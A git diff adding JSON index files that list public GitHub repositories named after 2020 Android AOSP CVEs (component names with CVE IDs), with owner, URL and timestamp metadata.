a/2020/CVE-2020-0203.json b/2020/CVE-2020-0203.json new file mode 100644 index 0000000000..8cce38adde --- /dev/null +++ b/2020/CVE-2020-0203.json @@ -0,0 +1,33 @@ +[ + { + "id": 484329383, + "name": "frameworks_base_AOSP10_r33_CVE-2020-0203", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2020-0203", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2020-0203", + "description": null, + "fork": false, + "created_at": "2022-04-22T06:59:37Z", + "updated_at": "2023-03-27T01:19:52Z", + "pushed_at": "2022-04-22T07:07:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0209.json b/2020/CVE-2020-0209.json new file mode 100644 index 0000000000..7487c77b6a --- /dev/null +++ b/2020/CVE-2020-0209.json @@ -0,0 +1,33 @@ +[ + { + "id": 462691803, + "name": "frameworks_base_CVE-2020-0209", + "full_name": "pazhanivel07\/frameworks_base_CVE-2020-0209", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_CVE-2020-0209", + "description": null, + "fork": false, + "created_at": "2022-02-23T10:44:33Z", + "updated_at": "2023-03-27T01:28:38Z", + "pushed_at": "2022-02-23T10:58:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0215.json b/2020/CVE-2020-0215.json new file mode 100644 index 0000000000..45c740b6e7 --- /dev/null +++ b/2020/CVE-2020-0215.json @@ -0,0 +1,33 @@ +[ + { + "id": 488091849, + "name": "packages_apps_Nfc_AOSP10_r33_CVE-2020-0215", + "full_name": "Trinadh465\/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215", + "description": null, + "fork": false, + "created_at": "2022-05-03T05:47:48Z", + "updated_at": "2022-05-03T05:49:58Z", + "pushed_at": "2022-05-03T05:50:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0218.json b/2020/CVE-2020-0218.json new file mode 100644 index 0000000000..28a7d59a49 --- /dev/null +++ b/2020/CVE-2020-0218.json @@ -0,0 +1,33 @@ +[ + { + "id": 484322270, + "name": "frameworks_av-CVE-2020-0218", + "full_name": "pazhanivel07\/frameworks_av-CVE-2020-0218", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-CVE-2020-0218", + "description": null, + "fork": false, + "created_at": "2022-04-22T06:32:40Z", + "updated_at": "2023-03-23T01:18:23Z", + "pushed_at": "2022-04-22T06:36:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0219.json b/2020/CVE-2020-0219.json new file mode 100644 index 0000000000..a70dfb729c --- /dev/null +++ b/2020/CVE-2020-0219.json @@ -0,0 +1,126 @@ +[ + { + "id": 462680708, + "name": "Settings_10-r33_CVE-CVE-2020-0219", + "full_name": "pazhanivel07\/Settings_10-r33_CVE-CVE-2020-0219", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/Settings_10-r33_CVE-CVE-2020-0219", + "description": null, + "fork": false, + "created_at": "2022-02-23T10:10:23Z", + "updated_at": "2023-03-27T01:23:55Z", + "pushed_at": "2022-02-23T10:16:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482826360, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0219", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219", + "description": null, + "fork": false, + "created_at": "2022-04-18T11:45:18Z", + "updated_at": "2023-03-27T01:35:16Z", + "pushed_at": "2022-04-18T11:48:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496165946, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old", + "description": null, + "fork": false, + "created_at": "2022-05-25T09:31:03Z", + "updated_at": "2023-03-27T01:13:43Z", + "pushed_at": "2022-05-25T09:39:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496173492, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one", + "description": null, + "fork": false, + "created_at": "2022-05-25T09:54:40Z", + "updated_at": "2023-03-27T01:14:27Z", + "pushed_at": "2022-05-25T09:58:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0225.json b/2020/CVE-2020-0225.json new file mode 100644 index 0000000000..41b08d6b63 --- /dev/null +++ b/2020/CVE-2020-0225.json @@ -0,0 +1,33 @@ +[ + { + "id": 476255453, + "name": "system_bt_AOSP10_r33_CVE-2020-0225", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2020-0225", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2020-0225", + "description": null, + "fork": false, + "created_at": "2022-03-31T10:23:25Z", + "updated_at": "2022-03-31T10:28:26Z", + "pushed_at": "2022-03-31T10:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0226.json b/2020/CVE-2020-0226.json new file mode 100644 index 0000000000..d05b8cf1d5 --- /dev/null +++ b/2020/CVE-2020-0226.json @@ -0,0 +1,64 @@ +[ + { + "id": 476183073, + "name": "frameworks_native_CVE-2020-0226", + "full_name": "Trinadh465\/frameworks_native_CVE-2020-0226", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_CVE-2020-0226", + "description": null, + "fork": false, + "created_at": "2022-03-31T06:43:19Z", + "updated_at": "2023-03-27T01:46:50Z", + "pushed_at": "2022-03-31T06:47:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482896007, + "name": "frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226", + "full_name": "ShaikUsaf\/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226", + "description": null, + "fork": false, + "created_at": "2022-04-18T15:24:51Z", + "updated_at": "2022-04-18T15:32:52Z", + "pushed_at": "2022-04-18T15:34:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0227.json b/2020/CVE-2020-0227.json new file mode 100644 index 0000000000..81c09b7b7a --- /dev/null +++ b/2020/CVE-2020-0227.json @@ -0,0 +1,33 @@ +[ + { + "id": 485246433, + "name": "framework_base_AOSP10_r33_CVE-2020-0227", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2020-0227", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2020-0227", + "description": null, + "fork": false, + "created_at": "2022-04-25T06:18:58Z", + "updated_at": "2022-04-25T06:29:23Z", + "pushed_at": "2022-04-25T06:28:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0240.json b/2020/CVE-2020-0240.json new file mode 100644 index 0000000000..cb400c4694 --- /dev/null +++ b/2020/CVE-2020-0240.json @@ -0,0 +1,33 @@ +[ + { + "id": 486929889, + "name": "external_v8_AOSP10_r33_CVE-2020-0240", + "full_name": "ShaikUsaf\/external_v8_AOSP10_r33_CVE-2020-0240", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/external_v8_AOSP10_r33_CVE-2020-0240", + "description": null, + "fork": false, + "created_at": "2022-04-29T10:25:19Z", + "updated_at": "2022-04-29T10:32:03Z", + "pushed_at": "2022-04-29T10:32:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0241.json b/2020/CVE-2020-0241.json new file mode 100644 index 0000000000..e9b1ae1f37 --- /dev/null +++ b/2020/CVE-2020-0241.json @@ -0,0 +1,33 @@ +[ + { + "id": 476605114, + "name": "frameworks_av_AOSP10_r33_CVE-2020-0241", + "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2020-0241", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2020-0241", + "description": null, + "fork": false, + "created_at": "2022-04-01T06:45:15Z", + "updated_at": "2022-04-01T06:50:38Z", + "pushed_at": "2022-04-01T06:51:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0242.json b/2020/CVE-2020-0242.json new file mode 100644 index 0000000000..4032a6d265 --- /dev/null +++ b/2020/CVE-2020-0242.json @@ -0,0 +1,64 @@ +[ + { + "id": 462712169, + "name": "frameworks_av-10-r33_CVE-2020-0242", + "full_name": "pazhanivel07\/frameworks_av-10-r33_CVE-2020-0242", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-10-r33_CVE-2020-0242", + "description": null, + "fork": false, + "created_at": "2022-02-23T11:48:10Z", + "updated_at": "2023-03-23T01:13:15Z", + "pushed_at": "2022-02-23T11:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475811173, + "name": "frameworks_av-CVE-2020-0242_CVE-2020-0243", + "full_name": "pazhanivel07\/frameworks_av-CVE-2020-0242_CVE-2020-0243", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-CVE-2020-0242_CVE-2020-0243", + "description": null, + "fork": false, + "created_at": "2022-03-30T09:35:35Z", + "updated_at": "2023-03-23T01:18:29Z", + "pushed_at": "2022-03-30T09:46:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0245.json b/2020/CVE-2020-0245.json new file mode 100644 index 0000000000..e61a2f8479 --- /dev/null +++ b/2020/CVE-2020-0245.json @@ -0,0 +1,33 @@ +[ + { + "id": 476685662, + "name": "frameworks_av_AOSP10_r33_CVE-2020-0245", + "full_name": "Satheesh575555\/frameworks_av_AOSP10_r33_CVE-2020-0245", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_av_AOSP10_r33_CVE-2020-0245", + "description": null, + "fork": false, + "created_at": "2022-04-01T11:04:45Z", + "updated_at": "2023-03-23T01:15:44Z", + "pushed_at": "2022-04-01T11:09:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0377.json b/2020/CVE-2020-0377.json new file mode 100644 index 0000000000..f4201fe3e2 --- /dev/null +++ b/2020/CVE-2020-0377.json @@ -0,0 +1,33 @@ +[ + { + "id": 477553750, + "name": "system_bt_AOSP10_r33_CVE-2020-0377", + "full_name": "Satheesh575555\/system_bt_AOSP10_r33_CVE-2020-0377", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP10_r33_CVE-2020-0377", + "description": null, + "fork": false, + "created_at": "2022-04-04T04:52:47Z", + "updated_at": "2023-08-29T14:53:10Z", + "pushed_at": "2022-04-04T04:54:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0380.json b/2020/CVE-2020-0380.json new file mode 100644 index 0000000000..b2445253ab --- /dev/null +++ b/2020/CVE-2020-0380.json @@ -0,0 +1,33 @@ +[ + { + "id": 483531367, + "name": "system_bt_AOSP10_r33_CVE-2020-0380", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2020-0380", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2020-0380", + "description": null, + "fork": false, + "created_at": "2022-04-20T06:19:13Z", + "updated_at": "2022-04-20T06:24:47Z", + "pushed_at": "2022-04-20T06:26:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0381.json b/2020/CVE-2020-0381.json new file mode 100644 index 0000000000..38b5256b02 --- /dev/null +++ b/2020/CVE-2020-0381.json @@ -0,0 +1,33 @@ +[ + { + "id": 487202497, + "name": "external_sonivox_AOSP10_r33_CVE-2020-0381", + "full_name": "Trinadh465\/external_sonivox_AOSP10_r33_CVE-2020-0381", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_sonivox_AOSP10_r33_CVE-2020-0381", + "description": null, + "fork": false, + "created_at": "2022-04-30T06:37:25Z", + "updated_at": "2022-04-30T06:39:07Z", + "pushed_at": "2022-04-30T06:39:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0391.json b/2020/CVE-2020-0391.json new file mode 100644 index 0000000000..4457d9aa78 --- /dev/null +++ b/2020/CVE-2020-0391.json @@ -0,0 +1,33 @@ +[ + { + "id": 475869585, + "name": "framework_base_AOSP10_r33_CVE-2020-0391", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2020-0391", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2020-0391", + "description": null, + "fork": false, + "created_at": "2022-03-30T12:31:40Z", + "updated_at": "2022-03-30T12:48:42Z", + "pushed_at": "2022-03-30T12:48:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0392.json b/2020/CVE-2020-0392.json new file mode 100644 index 0000000000..70eacf1140 --- /dev/null +++ b/2020/CVE-2020-0392.json @@ -0,0 +1,33 @@ +[ + { + "id": 476642012, + "name": "frameworks_native_AOSP10_r33_CVE-2020-0392", + "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2020-0392", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2020-0392", + "description": null, + "fork": false, + "created_at": "2022-04-01T08:43:48Z", + "updated_at": "2023-03-27T01:28:33Z", + "pushed_at": "2022-04-01T08:46:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0394.json b/2020/CVE-2020-0394.json new file mode 100644 index 0000000000..8aa5a1d379 --- /dev/null +++ b/2020/CVE-2020-0394.json @@ -0,0 +1,95 @@ +[ + { + "id": 483210419, + "name": "packages_apps_settings_AOSP10_r33_CVE-2020-0394", + "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2020-0394", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2020-0394", + "description": null, + "fork": false, + "created_at": "2022-04-19T11:06:28Z", + "updated_at": "2022-04-19T11:11:26Z", + "pushed_at": "2022-04-19T11:11:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486047756, + "name": "Settings_10-r33_CVE-2020-0394", + "full_name": "pazhanivel07\/Settings_10-r33_CVE-2020-0394", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/Settings_10-r33_CVE-2020-0394", + "description": null, + "fork": false, + "created_at": "2022-04-27T04:42:49Z", + "updated_at": "2023-03-27T01:49:19Z", + "pushed_at": "2022-04-27T04:46:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486051433, + "name": "Settings_10-r33_CVE-2020-0394_02", + "full_name": "pazhanivel07\/Settings_10-r33_CVE-2020-0394_02", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/Settings_10-r33_CVE-2020-0394_02", + "description": null, + "fork": false, + "created_at": "2022-04-27T04:59:22Z", + "updated_at": "2023-03-27T01:49:02Z", + "pushed_at": "2022-04-27T05:01:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0401.json b/2020/CVE-2020-0401.json new file mode 100644 index 0000000000..28a18c2686 --- /dev/null +++ b/2020/CVE-2020-0401.json @@ -0,0 +1,64 @@ +[ + { + "id": 483198115, + "name": "frameworks_base_AOSP10_r33_CVE-2020-0401", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2020-0401", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2020-0401", + "description": null, + "fork": false, + "created_at": "2022-04-19T10:24:11Z", + "updated_at": "2023-03-27T01:47:32Z", + "pushed_at": "2022-04-19T10:30:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484687788, + "name": "framework_base_AOSP10_r33_CVE-2020-0401", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2020-0401", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2020-0401", + "description": null, + "fork": false, + "created_at": "2022-04-23T08:17:35Z", + "updated_at": "2022-04-23T09:43:07Z", + "pushed_at": "2022-04-23T09:42:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0409.json b/2020/CVE-2020-0409.json new file mode 100644 index 0000000000..edf1a58dc6 --- /dev/null +++ b/2020/CVE-2020-0409.json @@ -0,0 +1,33 @@ +[ + { + "id": 484024754, + "name": "system_core_AOSP10_r33_CVE-2020-0409", + "full_name": "nanopathi\/system_core_AOSP10_r33_CVE-2020-0409", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_core_AOSP10_r33_CVE-2020-0409", + "description": null, + "fork": false, + "created_at": "2022-04-21T11:30:46Z", + "updated_at": "2022-04-21T11:39:06Z", + "pushed_at": "2022-04-21T11:39:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + 